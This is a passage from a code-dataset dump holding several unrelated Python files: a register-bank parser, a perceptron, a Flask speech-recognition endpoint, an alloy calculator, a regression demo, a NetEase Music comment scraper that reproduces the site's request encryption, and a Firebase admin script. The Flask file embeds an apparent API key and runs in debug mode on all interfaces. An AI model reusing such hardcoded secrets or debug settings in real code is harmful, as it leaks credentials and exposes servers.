'unique_id': event.study_group.unique_id , \n 'start': event_start.strftime ( '%Y-%m- %d %H:%M:%S' ), \n 'end': event_end.strftime ( '%Y-%m- %d %H:%M:%S' ), \n 'title': event.name, \n 'allDay': Allday,\n 'student_list': student_list,\n 'finished': finished,\n })\n\n if len(event_list) == 0 : \n raise http.Http404 \n else : \n return http.HttpResponse(json.dumps(event_list), content_type = 'application/json' 
)\n","sub_path":"event/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"552321534","text":"from SVutil import *\nimport re\n\nVERBOSE = os.environ.get('VERBOSE',0)\n\nclass EAdict(): #easy access\n def __init__(self, items):\n if type(items) == dict:\n self.dic = items \n elif type(items) == list:\n self.dic = { v:i for i,v in enumerate(items) }\n else:\n print(\"un-supported type for EAdict\")\n raise TypeError\n def __getattr__(self, n):\n return self.dic[n]\n # completer\n def __svcompleterattr__(self):\n x = set(self.dic.keys())\n return x\n def __svcompleterfmt__(self, attr, match):\n if attr in self.dic.keys():\n return f'{SVutil.ccyan}{match}{SVutil.creset}' \n else:\n return f'{match}' \n\nparamfield = EAdict([ 'name' \n , 'dim' \n , 'tp'\n , 'bw' \n , 'num' \n , 'bwstr' \n , 'dimstr'\n , 'numstr' \n , 'paramtype'\n , 'numstrlst'] )\ntypefield = EAdict([ 'name' \n , 'bw' \n , 'dim' \n , 'tp' \n , 'enumliteral'\n , 'cmts' ] )\nportfield = EAdict( [ 'direction' \n , 'name' \n , 'dim' \n , 'tp' \n , 'bw' \n , 'bwstr'\n , 'dimstr'\n , 'dimstrtuple'\n , 'cmts'\n , 'group' ] )\nenumfield = EAdict( [ 'name'\n , 'bw'\n , 'dim'\n , 'tp'\n , 'enumliterals'\n , 'cmts'] )\nenumsfield = EAdict( [ 'names' \n , 'nums' \n , 'cmts'\n , 'idxs'\n , 'sizes'\n , 'name_bases'\n , 'groups'] )\nenumlfield = EAdict( [ 'name' \n , 'num' \n , 'cmt'\n , 'idx'\n , 'size'\n , 'name_base', 'group' ] )\nmacrofield = EAdict( [ 'args'\n , 'macrostr'\n , 'lambda'] )\n\nclass SVclass(SVutil):\n def __init__(self):\n self.w = 20\n self.V_(VERBOSE) \n pass\n def __getattr__(self, n):\n return self.data[self.field.dic[n]]\n @property\n def ShowData(self):\n s = ''\n for f in self.field.dic:\n try:\n s += f'{self.data[self.field.dic[f]].__repr__():<{self.w}}'\n except:\n s += f'{\"\":<{self.w}}'\n return s + '\\n'\n @property\n def ShowLine(self):\n return f'{\"\":{self.linechar}<{len(self.field.dic)*self.w}}\\n'\n @property\n def ShowField(self):\n s = ''\n for f in self.field.dic: \n s += f'{f:<{self.w}}'\n return s + '\\n'\n @property\n def Show(self):\n s = ''\n s += self.ShowField\n s += self.ShowLine\n s += self.ShowData \n return s\n def ShowDataCb(self, cblst):\n ''' \n cblst:callback list; applied to each field\n Ex: ShowDataCb([hex,bin]) would print hex(field0), bin(field1)\n '''\n s = ''\n for f, cb in zip(self.field.dic, cblst):\n _s = cb(self.data[self.field.dic[f]]) if cb else self.data[self.field.dic[f]]\n _s = _s.__repr__() if type(_s) != str else _s\n s += f'{_s:<{self.w}}'\n return s + '\\n'\n # completer\n def __svcompleterattr__(self):\n x = set(self.field.dic.keys())\n return x\n def __svcompleterfmt__(self, attr, match):\n if attr in self.field.dic.keys():\n return f'{SVutil.ccyan}{match}{SVutil.creset}' \n else:\n return f'{match}' \n \nclass SVParam(SVclass):\n field = paramfield\n def __init__(self, param=None):\n self.w = 20\n self.linechar = '='\n self.data = param\n\nclass SVStruct(SVclass):\n ''' bugged '''\n field = typefield\n def __init__(self, tp = None):\n self.w = 15\n self.linechar = '='\n self.datas = [ SVType(t) for t in tp] \n def IsAlias(self):\n pass\n @property\n def ShowData(self):\n for d in self.datas:\n d.ShowData\n \nclass SVType(SVclass):\n field = typefield\n def __init__(self, tp = None):\n self.w = 15\n self.linechar = '='\n self.data = tp\n def __repr__(self):\n type_ = type(self)\n module = type_.__module__\n qualname = type_.__qualname__\n 
return f\"<{module}.{qualname} {self.name} at {hex(id(self))}>\"\n @property\n def ShowData(self):\n s = ''\n for d in self.data:\n s += d.ShowData\n return s\n \nclass SVPort(SVclass):\n field = portfield\n def __init__(self, port=None):\n self.w = 20\n self.linechar = '='\n self.data = port\nclass SVEnums(SVclass):\n field = enumsfield\n def __init__(self, enums=None):\n self.w = 30\n self.linechar = '='\n self.data = enums\n #self.enumls = [ SVEnuml((name, num, cmt, idx, size, name_base)) \\\n # for name, num, cmt, idx, size, name_base in \\\n # zip( self.names, self.nums, self.cmts, self.idxs, self.sizes, self.name_bases) ]\n self.enumls = [ SVEnuml(d) for d in zip(*self.data)]\n def __str__(self):\n slst = [ str(i)+':'+x.__str__() for i,x in enumerate(self.enumls)]\n return '[ '+' , '.join(slst)+' ]'\nclass SVEnuml(SVclass):\n ''' enum literal '''\n field = enumlfield\n def __init__(self, enuml=None):\n self.w = 20\n self.linechar = '='\n self.data = enuml\n def __repr__(self):\n type_ = type(self)\n module = type_.__module__\n qualname = type_.__qualname__\n return f\"<{module}.{qualname} {self.name} at {hex(id(self))}>\"\n def __str__(self):\n return f\"\"\nclass SVRegbk(SVutil): \n '''\n Register bank information parsed from a *Regbk package\n regfields: SVEnums\n '''\n def __init__(self, pkg):\n self.customlst = [ 'regfield_suf',\n 'default_suf',\n 'bw_suf',\n 'arr_num_suf',\n 'reserved_name',\n 'regaddr_name',\n 'regaddr_arr_name',\n 'regbw_name',\n 'regaddrbw_name',\n 'regbsize_name',\n 'regbsizebw_name',\n 'regintr_name']\n self.userfunclst = ['ShowAddr']\n self.regfield_suf = '_regfield'\n self.default_suf = '_DEFAULT'\n self.bw_suf = '_BW'\n self.arr_num_suf = '_NUM'\n self.reserved_name = 'RESERVED'\n self.regaddr_name = 'regaddr'\n self.regaddr_arr_name = 'regaddr_arr'\n self.regbw_name = 'REG_BW'\n self.regaddrbw_name = 'REG_ADDR_BW'\n self.regbsize_name = 'REG_BSIZE'\n self.regbsizebw_name = 'REG_BSIZE_BW'\n self.regintr_name = 'raw_intr_stat'\n\n self.name = pkg.name\n self.verbose = V_(VERBOSE) \n self.w = 20\n self.pkg = pkg\n self.addrs = pkg.enums.get(self.regaddr_name) \n self.addrs = SVEnums(self.addrs) if self.addrs else None\n self.addrsdict = { x.name: x for x in self.addrs.enumls } if self.addrs else None\n self.regaddrs = self.addrs\n self.regaddrsdict = self.addrsdict\n self.regaddrsreversedict = {v:k for k,v in self.addrsdict.items()} if self.addrsdict else None\n self.regaddrs_arr = pkg.enums.get(self.regaddr_arr_name)\n self.regaddrs_arr = SVEnums(self.regaddrs_arr) if self.regaddrs_arr else None\n self.regaddrs_arrdict = { x.name: x for x in self.regaddrs_arr.enumls } if self.regaddrs_arr else None\n self.regbw = pkg.params.get(self.regbw_name)\n self.regaddrbw = pkg.params.get(self.regaddrbw_name)\n self.regbsize = pkg.params.get(self.regbsize_name)\n self.regbsizebw = pkg.params.get(self.regbsizebw_name)\n self.regtypes = {}\n self.regmembtypes = {}\n self.regfields = {} \n self.regslices = {}\n self.regdefaults = {}\n self.regbws = {}\n self.params = {} \n self.raw_intr_stat = self.GetType(self.regintr_name)\n for i,v in pkg.paramsdetail.items():\n _v = SVParam(v)\n self.params[i]=(_v)\n _s = i.split(self.default_suf)\n if len(_s) == 2:\n self.regdefaults[_s[0]] = _v\n _s = i.split(self.bw_suf)\n if len(_s) == 2:\n self.regbws[_s[0]] = _v\n for i,v in pkg.enums.items():\n self.EnumToRegfield(i,v)\n for i,v in pkg.types.items():\n while True:\n _v = v[0]\n subt = pkg.types.get(SVType(_v).tp)\n if len(v)==1 and subt:\n v = subt \n else:\n break\n _v = [ 
SVType(vv) for vv in v]\n tt = [ self.GetType(vv.tp) for vv in _v ]\n self.regtypes[i.upper()] = _v\n self.regmembtypes[i.upper()] = tt\n if self.addrsdict:\n for k in self.addrsdict.keys():\n tp = self.regtypes.get(k)\n if type(tp) == list and k not in self.regslices:\n self.StructToRegfield(k, tp)\n #self.regfields = pkg. TODO reg fields, defaults etc...\n def GetDefaultsStr(self, name, lst=False):\n reg = self.regaddrsdict.get(name)\n d = self.regdefaults.get(name)\n if not d:\n d = self.regdefaults.get(reg.name_base)\n if not d:\n return None \n if lst:\n _s = d.numstrlst\n else:\n _s = d.numstr\n return _s \n def GetBWStr(self, name, lst=False):\n reg = self.regaddrsdict.get(name)\n bw = self.regbws.get(name)\n if not bw:\n bw = self.regbws.get(reg.name_base) \n if not bw:\n return None \n try:\n if lst:\n _s = bw.numstrlst\n else:\n _s = bw.numstr\n except:\n _s = str(bw)\n return _s \n def GetType(self, tp):\n tp = self.pkg.AllType.get(tp)\n return [ SVType(t) for t in tp] if tp else None\n def EnumToRegfield(self, name, enum):\n _v = SVEnums(enum)\n _s = name.split(self.regfield_suf)\n if len(_s) == 2:\n self.regfields[_s[0]] = _v\n pre_slice = 0\n self.regslices[_s[0]] = []\n _regslices =[ (name, [(start, end-1)] ) for name, start, end in zip(_v.names, _v.nums, _v.nums[1:]+[self.regbw])] \n reserved = []\n for ii in _regslices:\n if self.reserved_name in ii[0]:\n reserved.append( ii[1][0] ) \n else:\n self.regslices[_s[0]].append(ii)\n if len(reserved)!=0:\n self.regslices[_s[0]] += [(self.reserved_name , reserved)]\n def StructToRegfield(self, name, struct):\n '''struct is list of SVType'''\n regfield = SVEnums([[] for i in enumsfield.dic])\n regslice = []\n rev = [i for i in struct]\n rev.reverse()\n num = 0\n for i in rev:\n regfield.cmts.append(i.cmts)\n regfield.nums += [num]\n regfield.names += [f'{name}_{i.name}'.upper()]\n regslice += [(i.name.upper(), [(num, num+i.bw-1)])]\n num += i.bw\n if num < self.regbw-1:\n regfield.nums += [num]\n regfield.names += [f'{name.upper()}_RESERVED']\n regslice += [('RESERVED', [(num, self.regbw-1)])]\n regfield.cmts.append(['']) \n self.regslices[name] = regslice \n import itertools \n regfield.enumls = [ SVEnuml(d) for d in itertools.zip_longest(*regfield.data)]\n self.regfields[name] = regfield\n self.regbws[name] = num \n def GetAddrCmt(self, reg):\n cmt = self.addrsdict[reg].cmt \n return self.GetCmt(cmt)\n def GetCmt(self, cmt):\n width = ''\n rw = ''\n arr= ''\n omit = ''\n comb = ''\n _ = ''\n for c in cmt:\n if type(c) != str:\n continue\n if re.search(r'RW|R/W|RO|WO|RC|W1C',c):\n rw= c.lstrip().rstrip()\n continue\n if re.search(r\"\\d\",c):\n width = c.lstrip().rstrip()\n continue\n if re.search(r\"arr|ARR\", c):\n arr = c.lstrip().rstrip()\n continue\n if re.search(r\"omit|OMIT\", c):\n omit = c.lstrip().rstrip()\n continue\n if re.search(r\"comb|COMB\", c):\n comb = c.lstrip().rstrip()\n continue\n return width, rw, arr , omit, comb, _ \n \n def GetAddrNField(self, reg):\n '''\n Return the address and regfield given the register name\n the address is multiplied by regaddrbw\n '''\n #TODO multi-dimensional register\n if type(reg)==int:\n addr = reg\n else:\n addr = self.regaddrsdict[reg].num * self.regbsize\n regfield = self.regfields.get(reg)\n nums = regfield.nums if regfield else [0]\n names = regfield.names if regfield else None\n return addr, nums, names \n def GetAddr(self, reg):\n if type(reg) == int:\n addr = reg\n elif type(reg) == tuple:\n addr = self.GetAddrNField(reg[0])[0] \n offset = reg[1] * self.regbsize\n addr 
+= offset \n elif type(reg) == str:\n addr = self.GetAddrNField(reg)[0]\n else:\n raise TypeError('un-recognized register sequence type')\n return addr \n def RegWrite(self, reg, datalst):\n '''\n Return the address ,packed data and register fields names given register name\n and list of data of each register fields.\n '''\n addr, regnums, regnames = self.GetAddrNField(reg)\n data = self.RegfieldPack(regnums, datalst)\n return addr, data, regnames\n def RegRead(self, reg, data):\n '''\n Return the address ,extracted data fields and register fields names given register name\n and read data.\n '''\n addr, regnums, regnames = self.GetAddrNField(reg)\n datalst = self.RegfieldExtract(regnums, data)\n return datalst, regnames \n def ShowAddr(self, valuecb=hex):\n print ( f'{self.pkg.name:-^{3*self.w}}')\n SVEnuml().ShowField\n SVEnuml().ShowLine\n for i in self.regaddrs.enumls:\n print(i.ShowDataCb([None, lambda x: str(x)+' '+hex(x*self.regbsize).upper(), None]))\n def ShowRegfield(self, name):\n pass\n def RegfieldPack (self, regfieldlst, datalst):\n '''\n The function packs the provided data list\n based on each fields to a data of bandwidth self.regbw.\n regfieldlst consists of a list\n Ex: [0,6,31]; the first data will be packed to data[5:0], then data[30:6] and data[31]\n this list corresponds to self.regfield['reg name'].nums\n If the last field reaches the MSB of the register, don't specify the end.\n Ex: [0,16] indicates two 16bit field on a 32b register\n '''\n data = 0\n try:\n iterator = iter(datalst)\n except TypeError:\n datalst = [datalst]\n else:\n pass\n for f, d in zip( regfieldlst, datalst):\n data = data + (d << f )\n msk = ( 1 << self.regbw) -1 \n data = data & msk\n return data\n def RegfieldExtract(self, regfieldlst, data):\n '''\n Given the regfield list and a data, extract each fields' bit slice\n Co-test with RegfieldPack by:\n datalst == g.regbk.RegfieldExtract( regfieldlst, g.regbk.RegfieldPack( regfieldlst, datalst))\n Ex:g.regbk.RegfieldExtract( [0,5,17,30,31], g.regbk.RegfieldPack( [0, 5, 17, 30, 31], [31, 1033, 2033, 0, 1]))\n '''\n datalst = []\n for s, e in zip(regfieldlst, regfieldlst[1:]+[self.regbw]):\n msk = (1 << e) -1 \n datalst.append((data & msk) >> s)\n return datalst[0] if len(datalst)==1 else datalst\n def RegfieldUnitTest(self):\n field = [ [0,5,17,30,31]\n ,[0,8,15]]\n datalst = [ [31, 1033, 2033, 0, 1]\n ,[56, 22,55]]\n err = []\n for f,d in zip(field, datalst):\n _d = self.RegfieldExtract(f, self.RegfieldPack(f, d))\n self.print(_d)\n err += [_d==d]\n return err \n \n","sub_path":"SVclass.py","file_name":"SVclass.py","file_ext":"py","file_size_in_byte":16276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"253159257","text":"import numpy as np\r\nimport csv\r\nimport random\r\nimport math\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Perceptron:\r\n\r\n def __init__(self, file, learning_rate):\r\n self.dados_treinamento = {}\r\n # self.dados_teste = {}\r\n self.pesos = {}\r\n self.learning_rate = learning_rate\r\n # self.filepath = file\r\n self.leitura(file)\r\n self.iniciar_pesos()\r\n self.somar()\r\n self.testar()\r\n\r\n def sigmoid(self, soma):\r\n resultado = (1 / (1 + np.exp(-soma)))\r\n\r\n if resultado >= 1.0:\r\n return 1\r\n else:\r\n return 0\r\n\r\n def dsigmoid(self):\r\n return 'd(a)'\r\n\r\n def treinar(self):\r\n for i in self.dados_treinamento:\r\n print(i)\r\n\r\n def ajustar_pesos(self, erro, classe):\r\n for i in range(len(self.pesos) - 1):\r\n self.pesos[i] = 
self.atualiza_peso(self.pesos[i], erro, classe)\r\n\r\n self.pesos[len(\r\n self.pesos) - 1] = self.atualiza_bias(self.pesos[len(self.pesos) - 1], erro)\r\n\r\n def iniciar_pesos(self):\r\n for i in range(len(self.dados_treinamento[0])):\r\n self.pesos[i] = random.uniform(0, 1)\r\n\r\n def atualiza_peso(self, peso, erro, classe):\r\n return peso + (self.learning_rate * erro * float(classe))\r\n\r\n def atualiza_bias(self, bias, erro):\r\n return bias + self.learning_rate * erro\r\n\r\n def leitura(self, file):\r\n with open(file, 'r') as arquivo:\r\n linhas = csv.reader(arquivo, delimiter=',')\r\n instancia = 0\r\n for i in linhas:\r\n self.dados_treinamento[instancia] = i\r\n instancia += 1\r\n\r\n def somar(self):\r\n # parar = False\r\n it = 0\r\n while it <= 100:\r\n\r\n for i in self.dados_treinamento:\r\n soma = 0\r\n for j in range(len(self.dados_treinamento[i]) - 1):\r\n soma += float(self.dados_treinamento[i][j]) * self.pesos[j]\r\n\r\n soma += float(self.pesos[len(self.dados_treinamento[i]) - 1])\r\n resultado = self.sigmoid(soma)\r\n erro = float(self.dados_treinamento[i][-1]) - resultado\r\n\r\n if erro != 0:\r\n self.ajustar_pesos(erro, self.dados_treinamento[i][-1])\r\n # print(self.pesos)\r\n\r\n it += 1\r\n\r\n def erro(self, classe, resposta):\r\n return classe - resposta\r\n\r\n def testar(self):\r\n # dados_teste = [[0, 0, 0],\r\n # [0, 1, 0],\r\n # [1, 0, 0],\r\n # [1, 1, 1]\r\n # ]\r\n\r\n x = np.linspace(0, 1, 200)\r\n y = np.linspace(0, 1, 200)\r\n classe_0 = []\r\n classe_1 = []\r\n\r\n for i in range(len(x)):\r\n resultado = self.sigmoid(\r\n (self.pesos[0] * x[i]) + (self.pesos[1] * y[i]) + self.pesos[2])\r\n if resultado == 1:\r\n classe_1.append([x[i], y[i]])\r\n else:\r\n classe_0.append([x[i], y[i]])\r\n x_1 = []\r\n y_1 = []\r\n x_0 = []\r\n y_0 = []\r\n for i in classe_1:\r\n x_1.append(i[0])\r\n y_1.append(i[1])\r\n for i in classe_0:\r\n x_0.append(i[0])\r\n y_0.append(i[1])\r\n # print(classe_0)\r\n\r\n plt.plot(x_0, y_0, 'o')\r\n plt.plot(x_1, y_1, 'o')\r\n plt.show()\r\n\r\n\r\nperceptron = Perceptron('iris.data', 0.01)\r\n\r\n# print (perceptron.dados_teste)\r\n","sub_path":"rede_neural.py","file_name":"rede_neural.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"429892216","text":"import speech_recognition as sr\nfrom flask import Flask, request\n\nimport os\n\napp = Flask(__name__)\n\n\ndef speech2text(filePath, lang=\"zh-cn\", api=\"bing\"):\n r = sr.Recognizer()\n with sr.AudioFile(filePath) as source:\n audio = r.record(source)\n\n BING_KEY = \"fc6d59b192804002bd0396ba65a778c3\"\n try:\n if api == \"bing\":\n rsp = r.recognize_bing(audio, key=BING_KEY, language=lang)\n elif api == \"google\":\n rsp = r.recognize_google(audio, language=lang)\n return rsp\n except sr.UnknownValueError:\n print((\"Error: Microsoft Bing Voice Recognition could not\"\n \"understand audio\"))\n return 'null'\n except sr.RequestError as e:\n print(\"Error: Could not request results from Microsoft Bing Voice Recognition service; {0}\".format(e))\n return 'null'\n\n\n@app.route('/')\ndef index():\n return 'Hello world'\n\n\n@app.route('/speech', methods=['POST'])\ndef resolve():\n data = request.data\n f = open('audio.wav', 'wb')\n\n f.write(data)\n f.close()\n text = None\n try:\n text = speech2text('audio.wav', lang='zh-hk', api='bing')\n except:\n pass\n print(text)\n return text\n\n\nif __name__ == \"__main__\":\n # print(speech2text(\"1.wav\", api=\"google\"))\n # 
print(speech2text(\"audio.wav\", api=\"bing\"))\n app.run(host='0.0.0.0', port=8000, debug=True)\n","sub_path":"Speech/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"260981276","text":"import itertools\nimport json\nimport csv\n\nradius = {\n 'Cr':128,\n 'Hf':225,\n 'Nb':146,\n 'Ta':146,\n 'Mo':139,\n 'W':139,\n 'V':143,\n 'Zr':230\n }\n\ndef calc_delta_h(combinations, delta_h):\n total_h = []\n for x in combinations:\n ans = 0\n for i in itertools.combinations(x,2):\n a,b = i\n ans += 4*delta_h[a][b]*0.2*0.2\n total_h.append(ans)\n return total_h\n\ndef calc_delta(combinations, radius):\n delta_vals = []\n for x in combinations:\n avg_radius = sum(map(lambda a: 0.2*radius[a], x))\n delta = 0\n for i in x:\n delta += 0.2*(1 - radius[i]/avg_radius)**2\n delta_vals.append(100*(delta**0.5))\n return delta_vals\n\ndelta_h = {}\nwith open('./delta_h.json', 'r') as f:\n delta_h = json.load(f)\n\nelements = ['Cr', 'Hf','Mo','Nb', 'Ta', 'V', 'W', 'Zr']\nfinal_set = []\nfor x in itertools.combinations(elements, 5):\n temp = []\n for i in x:\n temp.append(i)\n final_set.append(temp)\n\ndelta_vals = calc_delta(final_set, radius)\nh_vals = calc_delta_h(final_set, delta_h)\nhvals = map(str, h_vals)\ndelta_vals = map(str, delta_vals)\noutput = []\nfor x in range(len(final_set)):\n output.append(final_set[x] + [hvals[x]] + [delta_vals[x]])\nrequired_output = []\nfor x in output:\n if float(x[5]) >= -15 and float(x[5]) <= 5 and float(x[6]) <= 6.6:\n required_output.append(x)\nwith open('min_delta_out.csv', 'w') as f:\n csv_writer = csv.writer(f)\n csv_writer.writerows(required_output)\nwith open('delta_h.csv','w') as f:\n csv_writer = csv.writer(f)\n csv_writer.writerows(output)\n","sub_path":"paramter.py","file_name":"paramter.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"447507560","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.spatial.distance import cdist\n\ndef getData(n, k, graphon):\n b = np.random.uniform(0, 1, k)\n b = (b > 0.97) * 1 - (b < 0.03) * 1\n X = np.random.normal(0, 1, size=(n, k))\n Z = X @ b \n Q = graphon(Z)\n A = np.tril(np.random.uniform(0, 1, (n, n)) < Q, -1) * 1\n A = A + A.T\n return b, X, Q, A,Z\n\ndef getNbdKernel(A):\n A2 = A @ A.T\n dist = cdist(A2, A2, 'chebyshev')\n K = dist < np.percentile(dist, np.sqrt(np.log(n) / n) * 100, 0)\n\n return K * (1 / (np.sum(K, 0) + 1e-10))\n\nif __name__ == '__main__': \n np.random.seed(1)\n n = 1000\n k = 50\n\n b, X, Q, A, Z = getData(n, k, lambda Z: (np.sin((Z + Z[:, None])) + 1) * 0.2)\n K = getNbdKernel(A)\n \n lbd, v = np.linalg.eig(np.cov(X.T @ K))\n\n b_selected = v[:, np.argmax(lbd)]\n \n plt.figure(figsize=(11, 4))\n plt.stem(range(k), np.abs(b))\n plt.stem(range(k), np.abs(b_selected), markerfmt='yo', linefmt='y-')\n plt.title(\"Neighbohood inverse regression\")\n plt.xlim([-0.1, k])\n plt.ylim([-0.5, 1.2])\n plt.grid()\n plt.legend([r\"$|\\beta_i|$\", r\"$|\\widehat{\\beta}_i|$\", r\"$|\\widehat{\\beta}_i|$ (2nd)\"], loc=4)\n plt.tight_layout(pad=0.1)\n plt.savefig(\"nnir.png\")\n","sub_path":"NNIR/NNIR.py","file_name":"NNIR.py","file_ext":"py","file_size_in_byte":1254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"64455925","text":"import json\nimport requests\nfrom requests.exceptions import RequestException\nfrom 
Crypto.Cipher import AES\nfrom base64 import b64encode\nimport pandas as pd\nimport re\n\n\"\"\"\ncursor: -1\noffset: 0\norderType: 1\npageNo: 1\npageSize: 20\nrid: \"R_SO_4_36392029\"\nthreadId: \"R_SO_4_36392029\"\n\n\n function a(a) {\n var d, e, b = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\", c = \"\";\n for (d = 0; a > d; d += 1)\n e = Math.random() * b.length,\n e = Math.floor(e),\n c += b.charAt(e);\n return c\n }\n\n function b(a, b) {\n var c = CryptoJS.enc.Utf8.parse(b)\n , d = CryptoJS.enc.Utf8.parse(\"0102030405060708\")\n , e = CryptoJS.enc.Utf8.parse(a)\n , f = CryptoJS.AES.encrypt(e, c, {\n iv: d,\n mode: CryptoJS.mode.CBC\n });\n return f.toString()\n }\n\n\nwindow.asrsea(JSON.stringify(i8a), bwa9R([\"流泪\", \"强\"]), bwa9R(RQ4U.md), bwa9R([\"爱心\", \"女孩\", \"惊恐\", \"大笑\"]))\nfunction d(d, e, f, g) { \n var h = {} , i = a(16);\n return h.encText = b(d, g),\n h.encText = b(h.encText, i),\n h.encSecKey = c(i, e, f),\n :return h\n }\n\n\"\"\"\n\n# 定值\ne = \"010001\"\n\n# 定值\nf = \"00e0b509f6259df8642dbc35662901477df22677ec152b5ff68ace615bb7b725152b3ab17a876aea8a5aa76d2e417629ec4ee341f56135fccf695280104e0312ecbda92557c93870114af6c9d05c4f7f0c3685b7a46bee255932575cce10b424d813cfe4875d3e82047b97ddef52741d546b8e289dc6935b3ece0462db0a22b8e7\"\n\n# 定值\ng = \"0CoJUm6Qyw8W8jud\"\n\n# 定值\ni = \"Yab6WAtcfEn43ye3\"\n\nencSecKey = \"414ea241651795194f192cf02b9c2f98e8f1c54cf1a922653403087f86617c9bc7455b80124cb4ddbefc10e59c9d488b08fa83ebb6d761e772cc7c172c20986373945f9d064e799d5693b56c1544e84fdc6b729e3e7d834a89c3d1e21f3980130bbd9c944e123527d362d0ca35bc04d78dc9cbb5362d6ae7155cb527bd6d6748\"\n\n\n# params = {\n# \"encSecKey\": \"43f1a7fe1d42ecdb1213ea8dd91af356033e45938070dead58eabdb8a3f07d98669805bb8ef8d9ad5a51258cde0994b5422c95c6268ac05e9be3e0d0d0fb66494ea3a1a1249817230dff9d8904027da0b91d87c08a6b18b2310f79906aa9e681ac351f6668d2e07352ba03418ed14808f6b7ace6970748444e5749caa1c0c119\",\n# \"encText\": \"/mCDWalAo+wpM9IBCF/d5zJsy1nvHUxyr/Ewy4qHkoK4G5HffDsOQ2KWVE6Lew8x53M7a0CcoRep8HwoG5Stf2lPGpEBR45V9exJ/P7gNm2xL9DcqmYhVvZWD8L7eoEE\"\n#\n# }\n\n\ndef get_encText(data):\n first = aes(data, g)\n second = aes(first, i)\n return second\n\n\n# aes加密补齐16位\n# def add_to_16(text):\n# if len(text.encode('utf-8')) % 16:\n# add = 16 - (len(text.encode('utf-8')) % 16)\n# else:\n# add = 0\n# text = text + ('\\0' * add)\n# return text.encode('utf-8')\n\n# aes加密补齐16位\ndef to_16(data):\n pad = 16 - len(data) % 16\n data += chr(pad) * pad\n return data\n\n\ndef aes(text, key):\n key = key.encode('utf-8')\n iv = '0102030405060708'.encode('utf-8') # 偏移量\n # text = add_to_16(text)\n text = to_16(text)\n cryptos = AES.new(key=key, iv=iv, mode=AES.MODE_CBC)\n cipher_text = cryptos.encrypt(text.encode('utf-8'))\n return str(b64encode(cipher_text), \"utf-8\")\n\n\ndef main():\n print(\"{:=^30}\".format('获取网易云歌曲热评'))\n while True:\n song_id = input('请输入歌曲ID(输入0退出): ')\n if song_id == '':\n print(\"歌曲ID不能为空!\")\n continue\n if song_id == '0':\n print('Bye')\n break\n # song_id = '402073808'\n # song_id = '36392029'\n # 请求参数\n\n # print(resp)\n music_name = get_music_name(song_id)\n print(music_name)\n resp = get_hot_comments(song_id)\n data_l = get_content(resp)\n df = pd.DataFrame(data_l)\n # df.to_excel('./files/网易云.xlsx')\n print(df)\n\n\ndef get_hot_comments(song_id):\n url = \"https://music.163.com/weapi/comment/resource/comments/get?csrf_token=\"\n d = {\n \"cursor\": \"-1\",\n \"offset\": \"0\",\n \"orderType\": \"1\",\n \"pageNo\": \"1\",\n \"pageSize\": \"20\",\n \"rid\": 
f\"R_SO_4_{song_id}\",\n \"threadId\": f\"R_SO_4_{song_id}\",\n }\n\n # 第二页数据\n # d = {\n # \"cursor\": \"-1\",\n # \"offset\": \"40\",\n # \"orderType\": \"1\",\n # \"pageNo\": \"2\",\n # \"pageSize\": \"20\",\n # \"rid\": \"R_SO_4_36392029\",\n # \"threadId\": \"R_SO_4_36392029\",\n # }\n\n data = {\n \"params\": get_encText(json.dumps(d)),\n \"encSecKey\": encSecKey\n }\n resp = get_url(data=data, url=url, method='POST', type='json')\n return resp\n\n\ndef get_url(url, data=None, method='GET', type='html'):\n headers = {\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \"\n \"Chrome/90.0.4430.212 Safari/537.36 \"\n }\n try:\n if method == 'POST':\n r = requests.post(url, data=data, headers=headers)\n elif method == 'GET':\n r = requests.get(url, headers=headers)\n else:\n r = requests.get(url, headers=headers)\n if r.status_code == 200:\n if type == 'json':\n return r.json()\n elif type == 'html':\n return r.text\n else:\n return None\n except RequestException:\n return None\n\n\n# 获取热门评论\ndef get_content(data):\n data_l = []\n for item in data['data']['hotComments']:\n tmp = {\n '昵称': item['user']['nickname'],\n '评论': item['content'].strip().replace('\\n', ''),\n }\n data_l.append(tmp)\n return data_l\n\n\ndef get_music_name(song_id):\n url = f\"https://music.163.com/song?id={song_id}\"\n resp = get_url(url=url, method='GET', type='html')\n title = re.findall('(.*?)', resp)[0]\n return title\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/网易云音乐评论.py","file_name":"网易云音乐评论.py","file_ext":"py","file_size_in_byte":5759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"273350471","text":"import firebase_admin\r\nfrom firebase_admin import db\r\nfrom firebase_admin import auth\r\nfrom firebase_admin import credentials\r\n\r\n\r\ndef show_users():\r\n ref = db.reference('users')\r\n users = ref.get()\r\n for x in users:\r\n print(\"\\n\", \"User ID: \", x)\r\n for y in users[x]:\r\n print(\"\\t\", y, ':', users[x][y])\r\n\r\n\r\ndef add_user():\r\n email = input(\"Enter Email: \")\r\n password = input(\"Enter Password: \")\r\n try:\r\n user = auth.create_user(\r\n email=email,\r\n email_verified=True,\r\n password=password\r\n )\r\n\r\n city = input(\"Enter city: \")\r\n address = input(\"Enter address: \")\r\n firstName = input(\"Enter firstName: \")\r\n lastName = input(\"Enter lastName: \")\r\n\r\n users = db.reference('users')\r\n users.child(user.uid).set({'address': address, 'budget': 0, 'city': city, 'firstName': firstName, 'lastName': lastName})\r\n print(\"User: \", user.uid, \" successfully created\")\r\n except ValueError:\r\n print(\"Invalid arguments\")\r\n\r\n\r\ndef delete_user():\r\n uid = input(\"Enter User ID: \")\r\n try:\r\n auth.delete_user(uid=uid)\r\n users = 